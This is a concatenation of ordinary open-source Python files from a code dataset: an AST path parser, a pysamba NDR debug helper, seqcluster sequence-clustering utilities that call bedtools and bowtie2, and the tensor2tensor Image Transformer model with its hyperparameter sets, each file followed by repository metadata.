Recursively yields each path through the tree.
Arguments:
tree -> the abstract syntax tree to search
Keyword arguments:
cur -> a tuple storing the walked path. Used for recursive calls.
"""
children = list(ast.iter_child_nodes(tree))
if not children:
yield cur
else:
for child in children:
for path in _iter_paths(child, cur + (child,)):
yield path
def _get_path(tree, lineno):
""" Return the path in a tree that terminates at a line number.
Follow all paths in a tree using _iter_paths until finding one where a node
is on the desired line number. The path is a tuple of nodes, including the
root ast.Module node. If no node is found with the particular line number,
return an empty tuple.
Arguments:
tree -> the abstract syntax tree to search
lineno -> the line number
"""
for path in list(_iter_paths(tree)):
for node in path:
try:
node_lineno = node.lineno
except AttributeError:
pass
else:
if node_lineno == lineno:
return (tree,) + path
return ()
def _calculate_index(source, lineno, col_offset):
""" Return the index of a substring given a lineno and column.
Arguments:
source -> The source code string.
lineno -> The line number.
col_offset -> The column offset
"""
lines = source.splitlines(True)
return sum(len(line) for line in lines[:lineno-1]) + col_offset
def _parse_module(name):
""" Return an ast of the module at the absolute path. """
hierarchy = name.split('.')
name = hierarchy.pop()
if hierarchy:
pkg_path = _package_path(hierarchy)
module = imp.find_module(name, [pkg_path])
else:
module = imp.find_module(name)
tree = ast.parse(''.join(module[0].readlines()))
module[0].close()
return tree
def _package_path(hierarchy, pkg_path=None):
""" Return the path of a package.
Recursively search the hierarchy inwards to find the path of the innermost
entry.
Arguments:
hierarchy -> the result of package.split('.'), where package is the
absolute import name.
Keyword Arguments:
pkg_path -> May use this to begin the search path at a directory, but
its main purpose is for recursive calls to the function.
"""
if pkg_path:
pkg_path = [pkg_path]
if (len(hierarchy) == 1):
return imp.find_module(hierarchy[0], pkg_path)[1]
parent = hierarchy.pop(0)
parent_path = imp.find_module(parent, pkg_path)[1]
return _package_path(hierarchy, parent_path)
|
liasis/introspector
|
Introspector/Parser/parse.py
|
Python
|
gpl-3.0
| 26,239
|
[
"VisIt"
] |
b838c12cd8ce892d6e744fd8ae968906b0dbfb1a2782326d5b74fbc663275cb2
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__ = "Provide access to generic NDR routines"
from pysamba.library import library
NDR_OUT = 2
def debugPrint(text, printFunct, obj):
"Print an NDR structure to debug output"
library.ndr_print_function_debug(printFunct, text, NDR_OUT, obj)
|
racemidev/WMI_cmd
|
pysamba/ndr.py
|
Python
|
gpl-2.0
| 775
|
[
"VisIt"
] |
db482a009dcb6674cba39760df0857b6cf95838ae9842d1868e0926d957078bc
|
import operator
import os
import math
import seqcluster.libs.logger as mylog
logger = mylog.getLogger(__name__)
REMOVED = 0
def get_distance(p1, p2):
if p1.strand == "+":
d = p1.start-p2.start
else:
d = (p1.end-(p1.end-p1.start)) - (p2.end-(p2.end-p2.start))
return d
def get_ini_str(n):
# get space values
return "".join(" " for i in range(n))
def init_numlocidb(beds):
dict = {}
for filebed in beds:
db = os.path.basename(filebed)
dict[db] = 0;
return dict
def calc_complexity(nl):
ns = len(nl)
total = 0.0
for l in nl:
total += 1.0/l
#print(total)
total /= ns
return (total)
def calculate_size(vector):
maxfreq = 0
zeros = 0
counts = 0
total = len(vector.keys())
for s in vector.keys():
maxfreq = max(vector[s], maxfreq)
counts += int(vector[s])
if vector[s] == 0:
zeros += 1
return (counts*((total-zeros)/total))
def show_seq(clus_obj, index):
"""Get the precursor and map sequences to it.
this way we create a positional map."""
current = clus_obj.clus
clus_seqt = clus_obj.seq
clus_locit = clus_obj.loci
itern = 0
for idc in current.keys():
itern += 1
timestamp = str(idc)
seqListTemp = ()
f = open("/tmp/"+timestamp+".fa","w")
for idl in current[idc].loci2seq.keys():
seqListTemp = list(set(seqListTemp).union(current[idc].loci2seq[idl]))
maxscore = 0
for s in seqListTemp:
score = calculate_size(clus_seqt[s].freq)
maxscore = max(maxscore,score)
clus_seqt[s].score = score
seq = clus_seqt[s]
f.write(">"+s+"\n"+seq.seq+"\n")
f.close()
locilen_sorted = sorted(current[idc].locilen.iteritems(), key = operator.itemgetter(1),reverse = True)
lmax = clus_locit[locilen_sorted[0][0]]
f = open("/tmp/"+timestamp+".bed","w")
f.write("%s\t%s\t%s\t.\t.\t%s\n" % (lmax.chr,lmax.start,lmax.end,lmax.strand))
f.close()
os.system("bedtools getfasta -s -fi "+index+" -bed /tmp/"+timestamp+".bed -fo /tmp/"+timestamp+".pre.fa")
os.system("bowtie2-build /tmp/"+timestamp+".pre.fa /tmp/"+timestamp+".pre.ind >/dev/null 2>&1")
os.system("bowtie2 --rdg 7,3 --mp 4 --end-to-end --no-head --no-sq -D 20 -R 3 -N 0 -i S,1,0.8 -L 3 -f /tmp/"+timestamp+".pre.ind /tmp/"+timestamp+".fa -S /tmp/"+timestamp+".map >>bowtie.log 2>&1")
f = open("/tmp/"+timestamp+".map","r")
seqpos = {}
minv = 10000000
for line in f:
line = line.strip()
cols = line.split("\t")
seqpos[cols[0]] = int(cols[3])
if minv>int(cols[3]):
minv = int(cols[3])
f.close()
seqpos_sorted = sorted(seqpos.iteritems(), key = operator.itemgetter(1),reverse = False)
showseq = ""
showseq_plain = ""
for (s,pos) in seqpos_sorted:
ratio = (clus_seqt[s].score*1.0/maxscore*100.0)
realScore = (math.log(ratio,2)*2)
if realScore<0:
realScore = 0
# "score %s max %s ratio %s real %.0f" % (clus_seqt[s].score,maxscore,ratio,realScore)
##calculate the mean expression of the sequence and change size letter
showseq_plain += "<br>%s<a style = \"font-size:%.0fpx;\"href = javascript:loadSeq(\"%s\")>%s</a>" % ("".join("." for i in range(pos-1)),realScore+10,s,clus_seqt[s].seq)
#showseq+ = seqviz.addseq(pos-1,clus_seqt[s].len,clus_seqt[s].seq)
#current[idc].showseq = showseq
current[idc].showseq_plain = showseq_plain
os.system("rm /tmp/"+timestamp+"*")
clus_obj.clus = current
clus_obj.seq = clus_seqt
return clus_obj
def generate_position_bed(clus_obj):
##generate file with positions in bed format
bedaligned = ""
clus_id = clus_obj.clus
for idc in clus_id.keys():
clus = clus_id[idc]
for idl in clus.loci2seq.keys():
pos = clus_obj.loci[idl]
bedaligned += "%s\t%s\t%s\t%s\t%s\t%s\n" % (pos.chr,pos.start,pos.end,idc,idl,pos.strand)
return bedaligned
def _normalize_seqs(s, t):
"""Normalize to DESeq2"""
for ids in s:
obj = s[ids]
[obj.norm_freq.update({sample: 1.0 * obj.freq[sample] / t[sample]}) for sample in obj.norm_freq]
s[ids] = obj
return s
|
lpantano/seqcluster
|
seqcluster/libs/tool.py
|
Python
|
mit
| 4,514
|
[
"Bowtie"
] |
496ab4ed4a3bfd2d1b6633470366b474987cc8699c5ae40406595ef0f22f3624
|
# coding=utf-8
# Copyright 2022 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""image generation with transformer (attention).
encoder: [Self-Attention, Feed-forward] x n
decoder: [Self-Attention, Source-Target-Attention, Feed-forward] x n
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_image_attention as cia
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
import tensorflow.compat.v1 as tf
@registry.register_model
class Imagetransformer(t2t_model.T2TModel):
"""Conditional image generation with attention. See file docstring.
The model admits either a Categorical or discretized mixture of logistic
distributions (DMOL) as the likelihood. When using DMOL for training, double
check that the evaluation metrics also use it.
"""
def body(self, features):
hparams = copy.copy(self._hparams)
targets = features["targets"]
if (hparams.likelihood == cia.DistributionType.DMOL and
hparams.num_channels != 1):
raise ValueError("When using DMOL for the likelihood, bottom function "
" must be identity and num_channels must be 1.")
if (not tf.get_variable_scope().reuse and
hparams.mode != tf.estimator.ModeKeys.PREDICT):
tf.summary.image("targets", tf.to_float(targets), max_outputs=1)
# Extra losses list if we want to use moe.
losses = []
# Prepare decoder inputs and bias.
decoder_input, rows, cols = cia.prepare_decoder(targets, hparams)
# Add class label to decoder input.
if not hparams.unconditional:
inputs = features["inputs"]
decoder_input += tf.reshape(
inputs,
[common_layers.shape_list(targets)[0], 1, 1, hparams.hidden_size])
decoder_output = cia.transformer_decoder_layers(
decoder_input,
None,
hparams.num_decoder_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.dec_attention_type,
losses=losses,
name="decoder")
output = cia.create_output(decoder_output, rows, cols, targets, hparams)
if losses:
return output, {"extra_loss": tf.add_n(losses)}
else:
return output
def loss(self, logits, features):
if self._hparams.likelihood == cia.DistributionType.DMOL:
return common_layers.dml_loss(logits, features["targets"])
return super(Imagetransformer, self).loss(logits, features)
def sample(self, features):
"""Run the model and extract samples.
Args:
features: an map of string to `Tensor`.
Returns:
samples: an integer `Tensor`.
logits: a list of `Tensor`s, one per datashard.
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
"""
if self._hparams.likelihood == cia.DistributionType.DMOL:
logits, losses = self(features) # pylint: disable=not-callable
samples = common_layers.sample_from_discretized_mix_logistic(
logits, seed=None)
return samples, logits, losses
return super(Imagetransformer, self).sample(features)
def _slow_greedy_infer(self, features, decode_length):
"""A slow greedy inference method.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
samples: an integer `Tensor`.
logits: `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
losses: a dictionary: {loss-name (string): floating point `Scalar`}
"""
if self._hparams.likelihood == cia.DistributionType.DMOL:
raise NotImplementedError("Decoding is not currently available for DMOL.")
return super(Imagetransformer, self)._slow_greedy_infer(features,
decode_length)
@registry.register_model
class ImagetransformerMoe(t2t_model.T2TModel):
"""Conditional image generation with attention and MoE."""
@staticmethod
def use_body_sharded():
return True
def body_sharded(self, sharded_features):
dp = self._data_parallelism
hparams = copy.copy(self._hparams)
inputs = sharded_features["inputs"]
targets = sharded_features["targets"]
# Determine attention type and padding from hparams.
q_padding, kv_padding = "VALID", "VALID"
if hparams.q_filter_width > 1:
q_padding = "LEFT"
if hparams.kv_filter_width > 1:
kv_padding = "LEFT"
# Prepare decoder inputs and bias.
decoder_input, rows, cols = dp(cia.prepare_decoder_inputs,
inputs, targets, hparams)
# Run decoder.
# TODO(nikip): Use q_padding and kv_padding
del q_padding, kv_padding
decoder_output, extra_loss = cia.transformer_layers_sharded(
dp,
self._ps_devices,
decoder_input,
hparams.num_hidden_layers,
hparams,
self_attention_bias=None,
enc_output=None,
attention_type=hparams.dec_attention_type,
name="decoder")
output = dp(cia.create_output, decoder_output, rows, cols, targets, hparams)
return output, extra_loss
@registry.register_hparams
def image_transformer_base():
"""Set of hyperparameters."""
hparams = common_hparams.basic_params1()
hparams.hidden_size = 512
hparams.batch_size = 4
hparams.max_length = 3075
hparams.dropout = 0.0
hparams.clip_grad_norm = 0. # i.e. no gradient clipping
hparams.optimizer_adam_epsilon = 1e-9
hparams.learning_rate_decay_scheme = "noam"
hparams.learning_rate = 0.1
hparams.learning_rate_warmup_steps = 4000
hparams.initializer_gain = 0.2
hparams.num_hidden_layers = 6
hparams.initializer = "uniform_unit_scaling"
hparams.weight_decay = 0.0
hparams.optimizer_adam_beta1 = 0.9
hparams.optimizer_adam_beta2 = 0.98
hparams.label_smoothing = 0.0
hparams.bottom["targets"] = modalities.image_channel_embeddings_bottom
hparams.top["targets"] = modalities.identity_top
hparams.norm_type = "layer"
hparams.layer_prepostprocess_dropout = 0.0
hparams.add_hparam("filter_size", 512) # Add new ones like this.
# attention-related flags
hparams.add_hparam("num_heads", 8)
hparams.add_hparam("attention_key_channels", 0)
hparams.add_hparam("attention_value_channels", 0)
hparams.add_hparam("ffn_layer", "conv_hidden_relu")
# All hyperparameters ending in "dropout" are automatically set to 0.0
# when not in training mode.
hparams.add_hparam("attention_dropout", 0.0)
hparams.add_hparam("relu_dropout", 0.0)
hparams.add_hparam("pos", "timing") # timing, none
hparams.add_hparam("nbr_decoder_problems", 1)
hparams.add_hparam("num_output_layers", 3)
hparams.add_hparam("block_size", 1)
# dilated attention based flags
hparams.add_hparam("gap_sizes", [2, 4, 8, 16, 32, 64, 2, 4, 8, 16, 32, 64])
# image size related flags
# assuming that the image has same height and width
hparams.add_hparam("img_len", 32)
hparams.add_hparam("num_channels", 3)
# Local attention params
hparams.add_hparam("local_and_global_att", False)
hparams.add_hparam("block_length", 256)
hparams.add_hparam("block_width", 128)
hparams.add_hparam("num_encoder_layers", 4)
hparams.add_hparam("num_decoder_layers", 12)
hparams.add_hparam("dec_attention_type", cia.AttentionType.LOCAL_1D)
hparams.add_hparam("block_raster_scan", False)
# multipos attention params
hparams.add_hparam("q_filter_width", 1)
hparams.add_hparam("kv_filter_width", 1)
hparams.add_hparam("likelihood", cia.DistributionType.CAT)
hparams.add_hparam("unconditional", False) # unconditional generation
# parameters of discretized mixture of logistics loss from pixel cnn++
hparams.add_hparam("num_mixtures", 10)
# These parameters are only used when ffn_layer=="local_moe_tpu"
hparams.add_hparam("moe_overhead_train", 1.0)
hparams.add_hparam("moe_overhead_eval", 2.0)
hparams.moe_num_experts = 8
hparams.moe_loss_coef = 1e-3
# These parameters are for relative attention
hparams.add_hparam("shared_rel", False) # share relative embeddings
return hparams
@registry.register_hparams
def imagetransformer_base():
hparams = image_transformer_base()
return hparams
@registry.register_hparams
def imagetransformer_cifar10_base():
"""Best config for 2.90 bits/dim on CIFAR10 using cross entropy."""
hparams = image_transformer_base()
hparams.batch_size = 4
hparams.num_heads = 4
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.5
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_cifar10_base_dmol():
"""Best config for 2.90 bits/dim on CIFAR10 using DMOL."""
hparams = image_transformer_base()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
hparams.num_heads = 8
hparams.batch_size = 8
hparams.sampling_method = "random"
hparams.layer_preprocess_sequence = "n"
hparams.layer_postprocess_sequence = "da"
hparams.summarize_grads = True
hparams.hidden_size = 256
hparams.filter_size = 512
hparams.attention_key_channels = 512
hparams.attention_value_channels = 512
hparams.num_decoder_layers = 12
hparams.layer_prepostprocess_dropout = 0.1
hparams.learning_rate = 0.1
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.pos = "emb"
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_base_tpu():
"""Transformer base params for cifar-10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 6000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_base_imagenet_tpu():
"""Transformer base params for cifar-10."""
hparams = imagetransformer_base_tpu()
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_imagenet32_base():
"""Best config for ImageNet-32 with 3.77 bits/dim using cross entropy."""
hparams = imagetransformer_cifar10_base()
hparams.batch_size = 4
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_rel():
"""Base with relative attention."""
hparams = imagetransformer_base()
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_hparams
def imagetransformer_sep_channels():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 512
hparams.num_hidden_layers = 6
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 256
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l_multipos3():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l()
hparams.q_filter_width = 3
hparams.kv_filter_width = 3
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan():
"""big 1d model for conditional image generation.2.99 on cifar10."""
hparams = imagetransformer_sep_channels_8l()
hparams.block_width = 256
hparams.block_length = 256
hparams.hidden_size = 512
hparams.num_heads = 8
hparams.filter_size = 2048
hparams.batch_size = 4
hparams.max_length = 3075
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.num_decoder_layers = 8
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_uncond_dr03_dan_64():
"""big 1d model for unconditional generation on imagenet."""
hparams = imagetransformer_base_10l_8h_big_cond_dr03_dan()
hparams.unconditional = True
hparams.max_length = 14000
hparams.batch_size = 1
hparams.img_len = 64
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_sep_channels_8l_8h():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
hparams.num_heads = 8
hparams.batch_size = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 512
hparams.filter_size = 512
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
hparams.layer_preprocess_sequence = "n"
hparams.layer_postprocess_sequence = "da"
hparams.summarize_grads = True
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_base_8l_8h_big_cond_dr03_dan():
"""big 1d model for conditional image generation.2.99 on cifar10."""
hparams = imagetransformerpp_sep_channels_8l_8h()
hparams.hidden_size = 512
hparams.num_heads = 8
hparams.filter_size = 2048
hparams.batch_size = 4
hparams.max_length = 3075
hparams.layer_prepostprocess_dropout = 0.3
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.summarize_grads = True
hparams.learning_rate = 0.01
return hparams
@registry.register_hparams
def imagetransformerpp_base_8l_8h_big_cond_dr03_dan_a():
hparams = imagetransformerpp_base_8l_8h_big_cond_dr03_dan()
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan():
hparams = imagetransformerpp_base_8l_8h_big_cond_dr03_dan_a()
hparams.unconditional = True
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_a():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan()
hparams.learning_rate = 0.01
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_b():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan()
hparams.learning_rate = 0.1
hparams.hidden_size = 256
hparams.attention_key_channels = 512
hparams.attention_value_channels = 512
hparams.filter_size = 1024
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_b()
hparams.filter_size = 512
hparams.layer_prepostprocess_dropout = 0.1
hparams.learning_rate = 0.1
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.pos = "emb"
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
hparams.num_decoder_layers = 12
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
hparams.num_decoder_layers = 12
hparams.clip_grad_norm = 40.
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k()
hparams.batch_size = 8
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_rel():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k()
hparams.batch_size = 8
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_relsh():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_rel()
hparams.shared_rel = True
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p():
"""Gets to 2.92 in just under 4 days on 8 p100s."""
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l()
hparams.num_decoder_layers = 14
hparams.batch_size = 8
hparams.layer_prepostprocess_dropout = 0.2
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_bs1():
"""For 128x128."""
# TODO(trandustin): why are these running? max_length and img_len not set
# 256x256 was also training without setting max_length
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m()
hparams.batch_size = 1
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p_bs1():
"""For 128x128."""
hparams = imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p()
hparams.batch_size = 1
return hparams
@registry.register_hparams
def imagetransformerpp_base_5l_8h_big_uncond_dr00_dan_g_bs1():
"""For 256x256."""
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
# TODO(trandustin): I forgot to set this in the runs! Maybe it's not used in
# image transformer training implementation?
# hparams.img_len = 256
hparams.max_length = 66000 # allow for 256x256
hparams.batch_size = 1
hparams.num_decoder_layers = 5
hparams.hidden_size = 128
hparams.filter_size = 128
hparams.attention_key_channels = 64
hparams.attention_value_channels = 64
hparams.layer_prepostprocess_dropout = 0.0
return hparams
@registry.register_hparams
def imagetransformerpp_base_5l_8h_dr00_dan_g_bs1_adafactor():
"""For 256x256."""
hparams = imagetransformerpp_base_5l_8h_big_uncond_dr00_dan_g_bs1()
# Use Adafactor which uses less memory than Adam, and its recommendations.
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
return hparams
@registry.register_hparams
def imagetransformerpp_base_6l_8h_dr00_dan_g_bs1_adafactor():
"""For 256x256."""
hparams = imagetransformerpp_base_5l_8h_dr00_dan_g_bs1_adafactor()
hparams.num_decoder_layers = 6
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_eval():
"""Gets to 2.92 in just under 4 days on 8 p100s."""
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l()
hparams.num_decoder_layers = 14
hparams.batch_size = 8
# hparams.layer_prepostprocess_dropout = 0.2
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_128():
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.block_width = 128
hparams.block_length = 128
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_cond_dr03_dan():
"""Best conditional Cifar10 gen param."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_uncond_dr03_dan():
"""Best unconditional Cifar10 gen param."""
hparams = imagetransformer_base_10l_8h_big_cond_dr03_dan()
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.gap_sizes = [0, 16, 64, 0, 16, 64, 128, 0]
hparams.dec_attention_type = cia.AttentionType.DILATED
hparams.block_length = 128
hparams.block_width = 128
hparams.add_hparam("num_memory_blocks", 1)
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_b():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.block_width = 64
hparams.num_memory_blocks = 2
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_c():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.block_width = 32
hparams.num_memory_blocks = 4
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_d():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.gap_sizes = [0, 16, 64, 16, 64, 128, 256, 0]
return hparams
@registry.register_hparams
def imagetransformer_base_12l_8h_big():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.filter_size = 1024
hparams.num_decoder_layers = 12
hparams.batch_size = 1
hparams.hidden_size = 512
hparams.learning_rate_warmup_steps = 4000
hparams.sampling_method = "random"
hparams.beam_size = 1
hparams.block_width = 256
return hparams
@registry.register_hparams
def imagetransformer1d_base_8l_64by64():
"""hparams fo 12 layer big 1d model for imagenet 64x64."""
hparams = image_transformer_base()
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.num_decoder_layers = 8
hparams.batch_size = 1
hparams.block_length = 512
hparams.block_width = 768
hparams.layer_prepostprocess_dropout = 0.1
hparams.max_length = 14000
hparams.unconditional = int(False)
return hparams
@registry.register_hparams
def imagetransformer1d_base_12l_64by64():
"""hparams fo 12 layer big 1d model for imagenet 64x64."""
hparams = image_transformer_base()
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.num_decoder_layers = 12
hparams.batch_size = 1
hparams.block_length = 512
hparams.block_width = 768
hparams.layer_prepostprocess_dropout = 0.1
hparams.max_length = 14000
hparams.unconditional = int(False)
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big()
hparams.num_decoder_layers = 14
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big_dr01():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big()
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_12l_8h_big_uncond():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big()
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big_uncond():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big_uncond()
hparams.num_decoder_layers = 14
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_12l_16h_imagenet_large():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.num_hidden_layers = 12
hparams.batch_size = 1
hparams.filter_size = 2048
hparams.num_heads = 16
hparams.learning_rate_warmup_steps = 16000
hparams.sampling_method = "random"
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_16l_16h_imgnet_lrg_loc():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_12l_16h_imagenet_large()
hparams.num_hidden_layers = 16
hparams.local_attention = True
hparams.batch_size = 1
hparams.block_length = 256
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_16l_16h_imgnet_lrg_loc_128():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_12l_16h_imagenet_large()
hparams.num_hidden_layers = 16
hparams.local_attention = True
hparams.batch_size = 1
hparams.block_length = 128
return hparams
@registry.register_hparams
def imagetransformer_sep_output_channels_8l_local_and_global_att():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l()
hparams.sampling_method = "random"
hparams.local_and_global_att = True
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_uncond_dr01_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 10
hparams.num_heads = 16
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_dr01_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 10
hparams.num_heads = 16
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.unconditional = False
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
